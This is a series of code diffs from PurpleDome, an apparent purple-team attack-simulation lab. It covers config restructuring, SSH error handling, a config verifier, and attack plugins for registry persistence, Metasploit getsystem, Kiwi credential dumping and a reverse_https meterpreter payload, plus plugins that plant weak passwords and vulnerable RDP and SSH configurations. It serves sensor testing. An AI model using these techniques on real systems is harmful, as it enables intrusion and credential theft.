For you as a user to be flexible there is a vulnerability plugin type that (surprise !) adds vulnerabilities to targets.
This plugin type allows you to punch some holes into the protection of a machine. Which vulnerability plugins are loaded for a specific target is defined in the configuration file. Feel free to weaken the defenses.
@ -20,19 +22,19 @@ The boilerplate contains some basics:
* name: a unique name, also used in the config yaml file to reference this plugin
* description: A human readable description for this plugin.
* ttp: The TTP number of this kali attack. See https://attack.mitre.org/ Just as a hint which TTP this vulnerability could be related to
* references: A list of urls to blog posts or similar describing the attack
* required_files: A list. If you ship files with your plugin, listing them here will cause them to be installed on plugin init.
* ttp: The TTP number linked to this vulnerability. See https://attack.mitre.org/ as a hint which TTP this vulnerability could be related to. If you do not know the TTP, use "???"
* references: A list of urls to blog posts or similar describing the vulnerability
* required_files: If you ship files with your plugin, listing them here will cause them to be installed on plugin init.
Method: install (optional)
--------------------------
*start* installs the vulnerability on the target. *install* is called before that. If you have to setup anything in the plugin space (and not on the target) do it here.
*start* starts the vulnerability on the target. *install* is called before that. If you have to setup anything in the plugin space (and not on the target) do it here.
Method: start
-------------
Adds the vulnerability to the machine. The most important method you can use here is "self.run_cmd" and execute a shell command.
Starts the vulnerability on the machine. The most important method you can use here is "self.run_cmd" and execute a shell command.
Method: stop
------------

@ -25,10 +25,10 @@ Welcome to the Purple Dome documentation!
extending/vulnerability_plugins
extending/attack_plugins
extending/sensor_plugins
extending/attack_plugins
extending/vm_controller_plugins
extending/extending

@ -19,10 +19,20 @@ Experiment control is the core tool to run an experiment. It accepts a yaml conf
:func: create_parser
:prog: ./experiment_control.py
Testing YAML files
==================
Configuration can be a bit complex and mistakes can happen. To find them before you run Purpledome use pydantic_test.py
.. argparse::
:filename: ../pydantic_test.py
:func: create_parser
:prog: ./pydantic_test.py
Plugin manager
==============
List available plugins or a specific plugin config
List available plugins or a specific plugin config. Most importantly: You can verify your plugin using it !
.. argparse::
:filename: ../plugin_manager.py
@ -49,3 +59,10 @@ Directly control the machines
:func: create_parser
:prog: ./machine_control.py
Doc generator
=============
.. argparse::
:filename: ../doc_generator.py
:func: create_parser
:prog: ./doc_generator.py

@ -23,7 +23,7 @@ def check_plugins(arguments):
attack_logger = AttackLog(arguments.verbose)
plugin_manager = PluginManager(attack_logger)
res = plugin_manager.print_check()
if len(res) == 0:
if len(res) != 0:
print("*************************************")
print("Some issues in plugins were found: ")
print("\n".join(res))

@ -142,7 +142,7 @@ class MachineryPlugin(BasePlugin):
# print("===========> Processing config")
self.config = config
self.process_config(config.raw_config)
self.process_config(config.raw_config.__dict__)
def __call_remote_run__(self, cmd: str, disown: bool = False):
""" Simplifies connect and run

@ -1,6 +1,7 @@
#!/usr/bin/env python3
""" Base class for all plugin types """
from inspect import currentframe
import os
from typing import Optional
import yaml
@ -26,6 +27,16 @@ class BasePlugin():
self.default_config_name = "default_config.yaml"
def get_filename(self):
""" Returns the current filename. """
cf = currentframe() # pylint: disable=invalid-name
return cf.f_back.filename
def get_linenumber(self):
""" Returns the current linenumber. """
cf = currentframe() # pylint: disable=invalid-name
return cf.f_back.f_lineno
def get_playground(self):
""" Returns the machine specific playground

@ -90,9 +90,6 @@ class SSHFeatures(BasePlugin):
if retry <= 0:
raise NetworkError from error
do_retry = True
except paramiko.ssh_exception.NoValidConnectionsError as error:
self.vprint(f"No valid connection. Errors: {error.errors}", 1)
do_retry = True
if do_retry:
self.disconnect()
self.connect()
@ -133,14 +130,14 @@ class SSHFeatures(BasePlugin):
except paramiko.ssh_exception.NoValidConnectionsError as error:
self.vprint(f"SSH PUT: No valid connection. Errors: {error.errors}", 1)
do_retry = True
except FileNotFoundError as error:
self.vprint(f"SSH PUT: File not found: {error}", 0)
break
except OSError:
self.vprint("SSH PUT: Obscure OSError, ignoring (file should have been copied)", 1)
pass
# do_retry = True
# breakpoint()
except FileNotFoundError as error:
self.vprint(f"SSH PUT: File not found: {error}", 0)
break
if do_retry:
self.vprint(f"SSH PUT: Will retry {retries} times. Timeout: {timeout}", 3)
retries -= 1
@ -170,20 +167,19 @@ class SSHFeatures(BasePlugin):
do_retry = False
try:
res = self.connection.get(src, dst)
except (paramiko.ssh_exception.NoValidConnectionsError, UnexpectedExit) as error:
except (UnexpectedExit) as error:
if retry <= 0:
raise NetworkError from error
do_retry = True
except paramiko.ssh_exception.NoValidConnectionsError as error:
self.vprint(f"SSH GET: No valid connection. Errors: {error.errors}", 1)
do_retry = True
except OSError:
self.vprint("SSH GET: Obscure OSError, ignoring (file should have been copied)", 1)
pass
# do_retry = True
except FileNotFoundError as error:
self.vprint(error, 0)
break
except OSError:
self.vprint("SSH GET: Obscure OSError, ignoring (file should have been copied)", 1)
# do_retry = True
if do_retry:
self.disconnect()
self.connect()

@ -11,14 +11,14 @@ caldera:
attackers:
###
# Configuration for the first attacker. One should normally be enough
attacker:
- name: attacker
###
# Defining VM controller settings for this machine
vm_controller:
###
# Type of the VM controller, Options are "vagrant"
type: vagrant
vm_type: vagrant
###
# # path where the vagrantfile is in
vagrantfilepath: systems
@ -27,6 +27,8 @@ attackers:
# Name of machine in Vagrantfile
vm_name: attacker
nicknames:
###
# machinepath is a path where the machine specific files and logs are stored. Relative to the Vagrantfile path
# and will be mounted internally as /vagrant/<name>
@ -45,10 +47,10 @@ attackers:
# List of targets
targets:
target2:
- name: target2
#root: systems/target1
vm_controller:
type: vagrant
vm_type: vagrant
vagrantfilepath: systems
###
@ -100,22 +102,6 @@ targets:
- weak_user_passwords
- rdp_config_vul
###
# General sensor config config
sensors:
###
# Windows IDP plugin configuration
windows_idp:
###
# Name of the dll to use. Must match AV version
# dll_name: aswidptestdll.dll
dll_name: aswidptestdll.dll_21_1_B
###
# Folder where the IDP tool is located
idp_tool_folder: C:\\capture
###
# General attack config
attacks:
@ -123,18 +109,14 @@ attacks:
# configure the seconds the system idles between the attacks. Makes it slower. But attack and defense logs will be simpler to match
nap_time: 5
###
# Configuration for caldera
caldera_conf:
###
# The obfuscator to use between the implant and the server. Not all obfuscators are supported by all implants. Existing obfuscators:
# plain-text, base64, base64jumble, caesar, base64noPadding, steganography
obfuscator: plain-text
caldera_obfuscator: plain-text
###
# Jitter settings for the implant. it is min/max seconds. The first number has to be smaller. Default is 4/8
jitter: 4/8
caldera_jitter: 4/8
@ -149,6 +131,16 @@ plugin_based_attacks:
windows:
- fin7_1
###
# A list of caldera attacks to run against the targets.
caldera_attacks:
###
# Linux specific attacks. A list of caldera ability IDs
linux:
###
# Windows specific attacks. A list of caldera ability IDs
windows:
###
# Configuration for the plugin based attack tools
attack_conf:
@ -170,6 +162,21 @@ attack_conf:
nmap:
###
# General sensor config config
sensor_conf:
###
# Windows IDP plugin configuration
windows_idp:
###
# Name of the dll to use. Must match AV version
# dll_name: aswidptestdll.dll
dll_name: aswidptestdll.dll_21_1_B
###
# Folder where the IDP tool is located
idp_tool_folder: C:\\capture
###
# Settings for the results being harvested
results:

@ -0,0 +1,43 @@
#!/usr/bin/env python3
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin, Requirement
from app.interface_sfx import CommandlineColors
class CalderaAutostartPlugin1(AttackPlugin):
# Boilerplate
name = "caldera_autostart_1"
description = "Setting a registry key for autostart"
ttp = "T1547.001"
references = ["https://attack.mitre.org/techniques/T1547/001/"]
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.CALDERA]
def __init__(self):
super().__init__()
self.plugin_path = __file__
def run(self, targets):
""" Run the command
@param targets: A list of targets, ip addresses will do
"""
# HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
res = ""
self.attack_logger.vprint(f"{CommandlineColors.OKCYAN}Starting caldera attack to add run key {CommandlineColors.ENDC}", 1)
self.caldera_attack(self.targets[0],
"163b023f43aba758d36f524d146cb8ea",
parameters={"command_to_execute": r"C:\\Windows\\system32\\calc.exe"},
tactics="Persistence",
tactics_id="TA0003",
situation_description="Setting an autorun key runonce")
self.attack_logger.vprint(
f"{CommandlineColors.OKBLUE}Ending caldera attack to add run key {CommandlineColors.ENDC}", 1)
return res

@ -12,7 +12,7 @@ class MetasploitAutostart1Plugin(AttackPlugin):
# Boilerplate
name = "metasploit_registry_autostart_1"
description = "Modify the registry to autostart"
ttp = "T1547_1"
ttp = "T1547.001"
references = ["https://attack.mitre.org/techniques/T1547/001/"]
tactics = "Persistence"
tactics_id = "TA0003"
@ -104,7 +104,9 @@ class MetasploitAutostart1Plugin(AttackPlugin):
tactics=self.tactics,
tactics_id=self.tactics_id,
situation_description="",
countermeasure=""
countermeasure="",
# sourcefile=self.get_filename(),
# sourceline=self.get_linenumber()
)
res = self.metasploit.meterpreter_execute_on([command_create], target)
print(res)

@ -11,7 +11,7 @@ class MetasploitGetsystemPlugin(AttackPlugin):
# Boilerplate
name = "metasploit_getsystem"
description = "Privilege elevation via metasploit getsystem"
ttp = "????"
ttp = "???"
references = ["https://docs.rapid7.com/metasploit/meterpreter-getsystem/"]
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share

@ -11,7 +11,7 @@ class MetasploitKiwiPlugin(AttackPlugin):
# Boilerplate
name = "metasploit_kiwi"
description = "Extract credentials from memory. Kiwi is the more modern Mimikatz"
ttp = "t1003"
ttp = "T1003"
references = ["https://www.hackers-arise.com/post/2018/11/26/metasploit-basics-part-21-post-exploitation-with-mimikatz"]
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share

@ -0,0 +1,39 @@
#!/usr/bin/env python3
""" A command line tool to verify PurpleDome configuration files """
import argparse
from pprint import pprint
import sys
import yaml
from app.config_verifier import MainConfig
def load(filename):
""" Loads the config file and feeds it into the built in verifier """
with open(filename) as fh:
data = yaml.safe_load(fh)
return MainConfig(**data)
def create_parser():
""" Creates the parser for the command line arguments"""
parser = argparse.ArgumentParser("Parse a config file and verifies it")
parser.add_argument('--filename', default="experiment_ng.yaml")
return parser
if __name__ == "__main__":
arguments = create_parser().parse_args()
try:
r = load(arguments.filename)
except TypeError as e:
print("Config file has error(s):")
print(e)
sys.exit(1)
print("Loaded successfully: ")
pprint(r)
sys.exit(0)

@ -140,7 +140,27 @@ disable=print-statement,
exception-escape,
comprehension-escape,
line-too-long,
fixme
fixme,
# Added: no-self-use: We do not want stray external functions. And decorating it is not worth the mess
no-self-use,
# too-many-arguments: Must be fixed sooner or later in a refactoring. Not now
too-many-arguments,
# too-many-public-methods: Must be fixed sooner or later in a refactoring. Not now
too-many-public-methods,
# too-many-locals: Must be fixed sooner or later in a refactoring. Not now
too-many-locals,
# too-many-instance-attributes: Must be fixed sooner or later in a refactoring. Not now
too-many-instance-attributes,
# too-many-branches: Must be fixed sooner or later in a refactoring. Not now
too-many-branches,
# too-many-statements: Must be fixed sooner or later in a refactoring. Not now
too-many-statements,
# too-many-nested-blocks: Must be fixed sooner or later in a refactoring. Not now
too-many-nested-blocks,
# duplicate lines in files. Removed from the standard RC file. Will be used in a stricter one for manual code reviews
R0801
# Enable the message, report, category or checker with the given id(s). You can
# either give multiple identifier separated by comma (,) or put this option

@ -3,21 +3,26 @@ fabric==2.6.0
requests==2.25.1
simplejson==3.17.2
tox==3.22.0
sphinx-argparse==0.2.5
sphinxcontrib-autoyaml==0.6.1
sphinx-pyreverse==0.0.13
coverage==5.4
PyYAML==5.4.1
straight.plugin==1.5.0
sphinxcontrib.asciinema==0.3.2
paramiko==2.7.2
pymetasploit3==1.0.3
pylint
flask
pylint==2.9.3
flask==2.0.2
pydantic==1.8.2
dotmap==1.3.25
# Sphinx stuff
sphinx-argparse==0.2.5
sphinxcontrib-autoyaml==0.6.1
sphinx-pyreverse==0.0.13
sphinxcontrib.asciinema==0.3.2
# sphinx-pydantic # This one has issues that must be fixed upstream first
# Mypy stuff
mypy
types-PyYAML
types-requests
types-simplejson
types-paramiko
mypy==0.910
types-PyYAML==5.4.6
types-requests==2.25.6
types-simplejson==3.17.0
types-paramiko==2.7.0

@ -10,31 +10,31 @@ caldera:
# Attacks configuration
attackers:
###
# Configuration for the first attacker. One should normally be enough
attacker:
# Configuration for the first attacker. One should normally be enough. But it is still implemented as a list
- name: attacker
###
# Defining VM controller settings for this machine
vm_controller:
###
# Type of the VM controller, Options are "vagrant"
type: vagrant
# Type of the VM controller, Options are "vagrant" and "running_vm"
vm_type: vagrant
###
# # path where the vagrantfile is in
vagrantfilepath: systems
###
# Name of machine in Vagrantfile
# Name of machine in Vagrantfile, main way to reference this machine
vm_name: attacker
###
# Machine can have nicknames. They can be used in complex attacks to reference the machine
# Machine can have nicknames. They can be used in complex attacks to reference the machine in multiple ways
nicknames:
- "suspect 1"
###
# machinepath is a path where the machine specific files and logs are stored. Relative to the Vagrantfile path
# and will be mounted internally as /vagrant/<name>
# and will be mounted internally as /vagrant/<name> for linux machines
# If machinepath is not set PurpleDome will try "vm_name"
machinepath: attacker1
@ -50,16 +50,24 @@ attackers:
# List of targets
targets:
###
# Specific target
target1:
# Name of a specific target. It is implemented as a list, you can have several targets in your experiment
- name: target1
###
# Defining VM controller settings for this machine
vm_controller:
type: vagrant
###
# Type of the VM controller, Options are "vagrant" and "running_vm"
vm_type: vagrant
###
# # path where the vagrantfile is in
vagrantfilepath: systems
###
# simple switch if targets is used in attack simulation. Default is true. If set to false the machine will not be started
active: no
###
# Name of machine in Vagrantfile, main way to reference this machine
vm_name: target1
###
@ -67,36 +75,54 @@ targets:
nicknames:
- "web server"
###
# OS of the VM guest. Options are so far "windows", "linux"
os: linux
###
# Targets need a unique PAW name for caldera
paw: target1
###
# Targets need to be in a group for caldera. The group is more relevant than the paw. Better put every target in a unique group
group: red
###
# machinepath is a path where the machine specific files and logs are stored. Relative to the Vagrantfile path
# and will be mounted internally as /vagrant/<name> for linux machines
# If machinepath is not set PurpleDome will try "vm_name"
machinepath: target1
# Do not destroy/create the machine: Set this to "yes".
###
# Do not destroy/create the machine: Set this to "yes". Good if you want to keep this machine around between experiments
use_existing_machine: yes
###
# The folder all the implants will be installed into
# The folder all the implants will be installed into. IN the machine
playground: /home/vagrant
# Sensors to run on this machine
###
# List of sensors to run on this machine. They are implemented as plugins and have a unique name
sensors:
# - linux_idp
target2:
#root: systems/target1
- name: target2
###
# Defining VM controller settings for this machine
vm_controller:
type: vagrant
###
# Type of the VM controller, Options are "vagrant" and "running_vm"
vm_type: vagrant
###
# path where the vagrantfile is in
vagrantfilepath: systems
###
# simple switch if targets is used in attack simulation. Default is true. If set to false the machine will not be started
# simple switch defining if targets is used in attack simulation. Default is true. If set to false the machine will not be started
active: no
###
# Name of machine in Vagrantfile, main way to reference this machine
vm_name: target2
###
@ -105,13 +131,23 @@ targets:
- "t2"
- "practice target"
###
# OS of the VM guest. Options are so far "windows", "linux"
# This is the example for a windows machine. Windows machines are much trickier to handle in Vagrant ! Check the documentation
os: windows
###
# Targets need a unique PAW name for caldera
paw: target2w
###
# Targets need to be in a group for caldera. The group is more relevant than the paw. Better put every target in a unique group
group: red_windows
###
# machinepath is a path where the machine specific files and logs are stored. Relative to the Vagrantfile path
# and will be mounted internally as /vagrant/<name> for linux machines
# If machinepath is not set PurpleDome will try "vm_name"
machinepath: target2w
###
@ -137,6 +173,7 @@ targets:
###
# The folder all the implants will be installed into
# Windows can only use default playground at the moment !
# playground: C:\\Users\\PurpleDome
###
@ -145,22 +182,31 @@ targets:
- windows_idp
###
# Vulnerabilities to pre-install
# Vulnerabilities to pre-install. They are implemented as plugins
vulnerabilities:
- weak_user_passwords
- rdp_config_vul
# Ubuntu 20.10 (Groovy)
target3:
- name: target3
###
# Defining VM controller settings for this machine
vm_controller:
type: vagrant
###
# Type of the VM controller, Options are "vagrant" and "running_vm"
vm_type: vagrant
###
# path where the vagrantfile is in
vagrantfilepath: systems
###
# simple switch if targets is used in attack simulation. Default is true. If set to false the machine will not be started
active: yes
###
# Name of machine in Vagrantfile, main way to reference this machine
vm_name: target3
###
@ -169,15 +215,27 @@ targets:
- "red shirt"
- "the flag"
###
# OS of the VM guest. Options are so far "windows", "linux"
# This is the example for a windows machine. Windows machines are much trickier to handle in Vagrant ! Check the documentation
os: linux
###
# Targets need a unique PAW name for caldera
paw: target3
###
# Targets need to be in a group for caldera. The group is more relevant than the paw. Better put every target in a unique group
group: red
###
# machinepath is a path where the machine specific files and logs are stored. Relative to the Vagrantfile path
# and will be mounted internally as /vagrant/<name> for linux machines
# If machinepath is not set PurpleDome will try "vm_name"
machinepath: target3
###
# Do not destroy/create the machine: Set this to "yes".
use_existing_machine: no
@ -189,24 +247,12 @@ targets:
sensors:
- linux_idp
###
# Vulnerabilities to pre-install. They are implemented as plugins
vulnerabilities:
- sshd_config_vul
- weak_user_passwords
###
# General sensor config config
sensors:
###
# Windows IDP plugin configuration
windows_idp:
###
# Name of the dll to use. Must match AV version
dll_name: aswidptestdll.dll
###
# Folder where the IDP tool is located
idp_tool_folder: C:\\capture
###
# General attack config
attacks:
@ -214,17 +260,14 @@ attacks:
# configure the seconds the system idles between the attacks. Makes it slower. But attack and defense logs will be simpler to match
nap_time: 5
###
# Configuration for caldera
caldera_conf:
###
# The obfuscator to use between the implant and the server. Not all obfuscators are supported by all implants. Existing obfuscators:
# plain-text, base64, base64jumble, caesar, base64noPadding, steganography
obfuscator: plain-text
caldera_obfuscator: plain-text
###
# Jitter settings for the implant. it is min/max seconds. The first number has to be smaller. Default is 4/8
jitter: 4/8
caldera_jitter: 4/8
###
# A list of caldera attacks to run against the targets.
@ -272,6 +315,20 @@ attack_conf:
pwdfile: passwords.txt
nmap:
###
# General sensor config config
sensor_conf:
###
# Windows IDP plugin configuration
windows_idp:
###
# Name of the dll to use. Must match AV version
dll_name: aswidptestdll.dll
###
# Folder where the IDP tool is located
idp_tool_folder: C:\\capture
###
# Settings for the results being harvested

@ -75,6 +75,7 @@ Metasploit attack {{ e.name }}
+ Hunting Tag: {{ e.hunting_tag}}
+ At {{ e.timestamp }} a Metasploit command {{ e.name }} was used to attack {{ e.target }} from {{ e.source }}.
+ Description: {{ e.description }}
+ Code in {{ e.sourcefile }} / {{ e.sourceline }}
{% if e.metasploit_command is string() %}
+ Metasploit command: {{ e.metasploit_command }}
{% endif %}

@ -11,14 +11,14 @@ caldera:
attackers:
###
# Configuration for the first attacker. One should normally be enough
attacker:
- name: attacker
###
# Defining VM controller settings for this machine
vm_controller:
###
# Type of the VM controller, Options are "vagrant"
type: vagrant
vm_type: vagrant
###
# # path where the vagrantfile is in
vagrantfilepath: systems
@ -49,9 +49,9 @@ attackers:
targets:
###
# Specific target
target1:
- name: target1
vm_controller:
type: vagrant
vm_type: vagrant
vagrantfilepath: systems
vm_name: target1
@ -74,13 +74,20 @@ targets:
# Do not destroy/create the machine: Set this to "yes".
use_existing_machine: yes
target2:
### Sensors to run on this machine
sensors:
# - windows_osquery
- name: target2
#root: systems/target1
vm_controller:
type: vagrant
vm_type: vagrant
vagrantfilepath: systems
vm_name: target2
nicknames:
os: windows
paw: target2w
group: red
@ -101,6 +108,10 @@ targets:
# For non-vagrant ssh connections a ssh keyfile stored in the machinepath is required.
ssh_keyfile: id_rsa.3
### Sensors to run on this machine
sensors:
# - windows_osquery
###
# General attack config
attacks:
@ -108,6 +119,15 @@ attacks:
# configure the seconds the system idles between the attacks. Makes it slower. But attack and defense logs will be simpler to match
nap_time: 5
###
# The obfuscator to use between the implant and the server. Not all obfuscators are supported by all implants. Existing obfuscators:
# plain-text, base64, base64jumble, caesar, base64noPadding, steganography
caldera_obfuscator: plain-text
###
# Jitter settings for the implant. it is min/max seconds. The first number has to be smaller. Default is 4/8
caldera_jitter: 4/8
###
# A list of caldera attacks to run against the targets.
caldera_attacks:
@ -160,7 +180,7 @@ results:
###
# General sensor config config
sensors:
sensor_conf:
###
# Windows sensor plugin configuration
windows_sensor:

@ -11,14 +11,14 @@ caldera:
attackers:
###
# Configuration for the first attacker. One should normally be enough
attacker:
- name: attacker
###
# Defining VM controller settings for this machine
vm_controller:
###
# Type of the VM controller, Options are "vagrant"
type: vagrant
vm_type: vagrant
###
# # path where the vagrantfile is in
vagrantfilepath: systems
@ -27,6 +27,8 @@ attackers:
# Name of machine in Vagrantfile
vm_name: attacker
nicknames:
###
# machinepath is a path where the machine specific files and logs are stored. Relative to the Vagrantfile path
# and will be mounted internally as /vagrant/<name>
@ -46,12 +48,13 @@ attackers:
targets:
###
# Specific target
target1:
- name: target1
vm_controller:
type: vagrant
vm_type: vagrant
vagrantfilepath: systems
vm_name: target1
nicknames:
os: linux
###
# Targets need a unique PAW name for caldera
@ -64,13 +67,16 @@ targets:
# Do not destroy/create the machine: Set this to "yes".
use_existing_machine: yes
target2:
sensors:
- name: target2
#root: systems/target1
vm_controller:
type: vagrant
vm_type: vagrant
vagrantfilepath: systems
vm_name: target2
nicknames:
os: windows
paw: target2w
group: red
@ -91,6 +97,8 @@ targets:
# For non-vagrant ssh connections a ssh keyfile stored in the machinepath is required.
ssh_keyfile: id_rsa.3
sensors:
###
# A list of caldera attacks to run against the targets.
caldera_attacks:
@ -105,7 +113,24 @@ caldera_attacks:
#- "foo"
#- "bar"
sensor_conf:
###
# General attack config
attacks:
###
# configure the seconds the system idles between the attacks. Makes it slower. But attack and defense logs will be simpler to match
nap_time: 5
###
# The obfuscator to use between the implant and the server. Not all obfuscators are supported by all implants. Existing obfuscators:
# plain-text, base64, base64jumble, caesar, base64noPadding, steganography
caldera_obfuscator: plain-text
###
# Jitter settings for the implant. it is min/max seconds. The first number has to be smaller. Default is 4/8
caldera_jitter: 4/8
## A bug in production was triggered by this half config. Adding a unit test
###

@ -11,14 +11,14 @@ caldera:
attackers:
###
# Configuration for the first attacker. One should normally be enough
attacker:
- name: attacker
###
# Defining VM controller settings for this machine
vm_controller:
###
# Type of the VM controller, Options are "vagrant"
type: vagrant
vm_type: vagrant
###
# # path where the vagrantfile is in
vagrantfilepath: systems
@ -27,6 +27,8 @@ attackers:
# Name of machine in Vagrantfile
vm_name: attacker
nicknames:
###
# machinepath is a path where the machine specific files and logs are stored. Relative to the Vagrantfile path
# and will be mounted internally as /vagrant/<name>
@ -46,12 +48,15 @@ attackers:
targets:
###
# Specific target
target1:
- name: target1
vm_controller:
type: vagrant
vm_type: vagrant
vagrantfilepath: systems
vm_name: target1
nicknames:
os: linux
###
# Targets need a unique PAW name for caldera
@ -64,13 +69,17 @@ targets:
# Do not destroy/create the machine: Set this to "yes".
use_existing_machine: yes
target2:
sensors:
- name: target2
#root: systems/target1
vm_controller:
type: vagrant
vm_type: vagrant
vagrantfilepath: systems
vm_name: target2
nicknames:
os: windows
paw: target2w
group: red
@ -91,17 +100,8 @@ targets:
# For non-vagrant ssh connections a ssh keyfile stored in the machinepath is required.
ssh_keyfile: id_rsa.3
###
# Configuration for caldera
caldera_conf:
###
# The obfuscator to use between the implant and the server. Not all obfuscators are supported by all implants. Existing obfuscators:
# plain-text, base64, base64jumble, caesar, base64noPadding, steganography
obfuscator: foo-bar
sensors:
###
# Jitter settings for the implant. it is min/max seconds. The first number has to be smaller. Default is 4/8
jitter: 08/15
###
# A list of caldera attacks to run against the targets.
@ -131,6 +131,16 @@ plugin_based_attacks:
- medusa
- skylla
attacks:
###
# The obfuscator to use between the implant and the server. Not all obfuscators are supported by all implants. Existing obfuscators:
# plain-text, base64, base64jumble, caesar, base64noPadding, steganography
caldera_obfuscator: foo-bar
###
# Jitter settings for the implant. it is min/max seconds. The first number has to be smaller. Default is 4/8
caldera_jitter: 08/15
###
# Configuration for the plugin based attack tools
attack_conf:
@ -150,6 +160,8 @@ attack_conf:
# A file containing potential passwords
pwdfile: passwords.txt
sensor_conf:
###
# Settings for the results being harvested
results:

@ -11,14 +11,14 @@ caldera:
attackers:
###
# Configuration for the first attacker. One should normally be enough
attacker:
- name: attacker
###
# Defining VM controller settings for this machine
vm_controller:
###
# Type of the VM controller, Options are "vagrant"
type: vagrant
vm_type: vagrant
###
# # path where the vagrantfile is in
vagrantfilepath: systems
@ -27,6 +27,8 @@ attackers:
# Name of machine in Vagrantfile
vm_name: attacker
nicknames:
###
# machinepath is a path where the machine specific files and logs are stored. Relative to the Vagrantfile path
# and will be mounted internally as /vagrant/<name>
@ -46,12 +48,19 @@ attackers:
targets:
###
# Specific target
target1:
- name: target1
vm_controller:
type: vagrant
vm_type: vagrant
vagrantfilepath: systems
vm_name: target1
# Used for tests
nicknames:
# - 1
# - 2
# - 3
os: linux
###
# Targets need a unique PAW name for caldera
@ -64,13 +73,23 @@ targets:
# Do not destroy/create the machine: Set this to "yes".
use_existing_machine: yes
target2:
### Sensors to run on this machine
sensors:
# - windows_osquery
- name: target2
#root: systems/target1
vm_controller:
type: vagrant
vm_type: vagrant
vagrantfilepath: systems
vm_name: target2
# Used for tests
nicknames:
- a
- b
- c
os: windows
paw: target2w
group: red
@ -91,6 +110,10 @@ targets:
# For non-vagrant ssh connections a ssh keyfile stored in the machinepath is required.
ssh_keyfile: id_rsa.3
### Sensors to run on this machine
sensors:
# - windows_osquery
###
# General attack config
attacks:
@ -98,6 +121,15 @@ attacks:
# configure the seconds the system idles between the attacks. Makes it slower. But attack and defense logs will be simpler to match
nap_time: 5
###
# The obfuscator to use between the implant and the server. Not all obfuscators are supported by all implants. Existing obfuscators:
# plain-text, base64, base64jumble, caesar, base64noPadding, steganography
caldera_obfuscator: plain-text
###
# Jitter settings for the implant. it is min/max seconds. The first number has to be smaller. Default is 4/8
caldera_jitter: 4/8
###
# A list of caldera attacks to run against the targets.
caldera_attacks:
@ -150,7 +182,7 @@ results:
###
# General sensor config config
sensors:
sensor_conf:
###
# Windows sensor plugin configuration
windows_sensor:

@ -11,14 +11,14 @@ caldera:
attackers:
###
# Configuration for the first attacker. One should normally be enough
attacker:
- name: attacker
###
# Defining VM controller settings for this machine
vm_controller:
###
# Type of the VM controller, Options are "vagrant"
type: vagrant
vm_type: vagrant
###
# # path where the vagrantfile is in
vagrantfilepath: systems
@ -27,6 +27,8 @@ attackers:
# Name of machine in Vagrantfile
vm_name: attacker
nicknames:
###
# machinepath is a path where the machine specific files and logs are stored. Relative to the Vagrantfile path
# and will be mounted internally as /vagrant/<name>
@ -46,12 +48,13 @@ attackers:
targets:
###
# Specific target
target1:
- name: target1
vm_controller:
type: vagrant
vm_type: vagrant
vagrantfilepath: systems
vm_name: target1
nicknames:
os: linux
###
# Targets need a unique PAW name for caldera
@ -64,13 +67,16 @@ targets:
# Do not destroy/create the machine: Set this to "yes".
use_existing_machine: yes
target2:
sensors:
- name: target2
#root: systems/target1
vm_controller:
type: vagrant
vm_type: vagrant
vagrantfilepath: systems
vm_name: target2
nicknames:
os: windows
paw: target2w
group: red
@ -91,6 +97,8 @@ targets:
# For non-vagrant ssh connections a ssh keyfile stored in the machinepath is required.
ssh_keyfile: id_rsa.3
sensors:
###
# General attack config
attacks:
@ -150,6 +158,4 @@ results:
###
# General sensor config config
sensors:
foo:
sensor_conf:

@ -0,0 +1,20 @@
targets:
target1:
vm_controller:
type: vagrant
vagrantfilepath: systems
vm_name: target1
os: linux
###
# Targets need a unique PAW name for caldera
paw: target1
###
# Targets need to be in a group for caldera
group: red
machinepath: target1
# Do not destroy/create the machine: Set this to "yes".
use_existing_machine: yes
attackers:

@ -11,14 +11,14 @@ caldera:
attackers:
###
# Configuration for the first attacker. One should normally be enough
attacker:
- name: attacker
###
# Defining VM controller settings for this machine
vm_controller:
###
# Type of the VM controller, Options are "vagrant"
type: vagrant
vm_type: vagrant
###
# # path where the vagrantfile is in
vagrantfilepath: systems
@ -27,6 +27,8 @@ attackers:
# Name of machine in Vagrantfile
vm_name: attacker
nicknames:
###
# machinepath is a path where the machine specific files and logs are stored. Relative to the Vagrantfile path
# and will be mounted internally as /vagrant/<name>
@ -46,12 +48,13 @@ attackers:
targets:
###
# Specific target
target1:
- name: target1
vm_controller:
type: vagrant
vm_type: vagrant
vagrantfilepath: systems
vm_name: target1
nicknames:
os: linux
###
# Targets need a unique PAW name for caldera
@ -64,13 +67,17 @@ targets:
# Do not destroy/create the machine: Set this to "yes".
use_existing_machine: yes
target2:
sensors:
- name: target2
#root: systems/target1
vm_controller:
type: vagrant
vm_type: vagrant
vagrantfilepath: systems
vm_name: target2
nicknames:
os: windows
paw: target2w
group: red
@ -91,6 +98,8 @@ targets:
# For non-vagrant ssh connections a ssh keyfile stored in the machinepath is required.
ssh_keyfile: id_rsa.3
sensors:
###
# General attack config
attacks:
@ -99,9 +108,7 @@ attacks:
nap_time: 5
## Broken caldera conf
caldera_conf:
foo: bar
sensor_conf:
###
# A list of caldera attacks to run against the targets.

@ -0,0 +1,22 @@
#!/usr/bin/env python3
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin, Requirement
class MissingRunPlugin(AttackPlugin):
# Boilerplate
name = "missing_run"
description = "Migrate meterpreter to another process via metasploit"
ttp = "T1055"
references = ["https://attack.mitre.org/techniques/T1055/"]
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self):
super().__init__()
self.plugin_path = __file__

@ -0,0 +1,48 @@
#!/usr/bin/env python3
# A plugin to nmap targets slow motion, to evade sensors
from plugins.base.attack import AttackPlugin, Requirement
import socket
class MetasploitMigratePlugin(AttackPlugin):
# Boilerplate
name = "no TTP"
description = "This one has no ttp"
references = ["https://attack.mitre.org/techniques/T1055/"]
required_files = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.METASPLOIT]
def __init__(self):
super().__init__()
self.plugin_path = __file__
def run(self, targets):
""" Run the command
@param targets: A list of targets, ip addresses will do
"""
res = ""
payload_type = "windows/x64/meterpreter/reverse_https"
payload_name = "babymetal.exe"
target = self.targets[0]
ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip())
